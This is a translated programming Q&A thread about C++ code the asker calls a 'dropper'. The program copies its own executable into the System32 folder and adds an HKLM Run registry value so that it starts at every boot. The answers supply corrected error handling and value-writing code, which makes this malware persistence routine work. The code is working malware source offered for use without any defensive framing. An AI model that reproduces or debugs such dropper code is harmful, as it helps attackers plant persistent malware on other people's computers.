即使GetLastError全部返回，我仍然看不到註冊表項0

Question

我嘗試在啓動時創建文件刪除器並啓動，但它啓動正確，但是當我使用regedit導航到所述的鍵時，我看不到它？這是怎麼回事？所有錯誤代碼返回0 .....

#include <iostream> 
#include <windows.h> 
#include <Shlwapi.h> 
using namespace std; 
string RegistryKeyName = "testdropper.exe"; 

int main() 
{ 
    std::string filename ="\\"; 
    char system[MAX_PATH]; 
    char pathtofile[MAX_PATH]; 
    memset(system, 0, MAX_PATH); 
    memset(pathtofile, 0, MAX_PATH); 


    //GET MODULE HANDLE OF CALLING PROGRAM I.E SERVER.EXE'S HANDLE 
    HMODULE GetModH = GetModuleHandle(NULL); 

cout << GetLastError(); 
    //GET PATH OF exe 
    GetModuleFileName(GetModH,pathtofile,sizeof(pathtofile)); 

    filename.append(PathFindFileNameA(pathtofile)); 

    //GET SYSTEM DIRECTORY LIKE SYSTEM32 
    GetSystemDirectory(system,sizeof(system)); 

    //APPEND MY FILENAME AFTER THE SYSTEMDIRECTORY 
    strcat(system, filename.c_str()); 

    //COPY SERVER TO THE SYSTEM32 FOLDER 
    CopyFile(pathtofile,system,false); 

    //MAKE A REGISTRY KEY TO THE SYSTEM32FOLDER WITH SERVER.EXE TO RUN AT STARTUP 
    HKEY hKey; 

    RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE,&hKey); 

    RegSetValueEx(hKey, RegistryKeyName.c_str(),0,REG_SZ,(const BYTE*)system,sizeof(system)); 

    RegCloseKey(hKey); 


    return 0; 
} 

Answer 1

...即使GetLastError返回所有0

RegXxx API函數通常直接在返回的值返回錯誤代碼，而不是通過GetLastError。

您可能與HKLM合作的一個常見錯誤是訪問權限不足。

Answer 2

你在你的代碼的兩個錯誤：

1. 你沒有錯誤檢查。

2. 您沒有正確寫入字符串值。

試試這個：

long ret = RegOpenKeyEx(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_SET_VALUE, &hKey); 
if (ret != ERROR_SUCCESS) 
{ 
    cout << "Unable to open key. Error " << ret; 
} 
else 
{ 
    ret = RegSetValueEx(hKey, RegistryKeyName.c_str(), 0, REG_SZ, (const BYTE*) system, strlen(system)+1); 
    if (ret != ERROR_SUCCESS) 
     cout << "Unable to write to key. Error " << ret; 

    RegCloseKey(hKey); 
}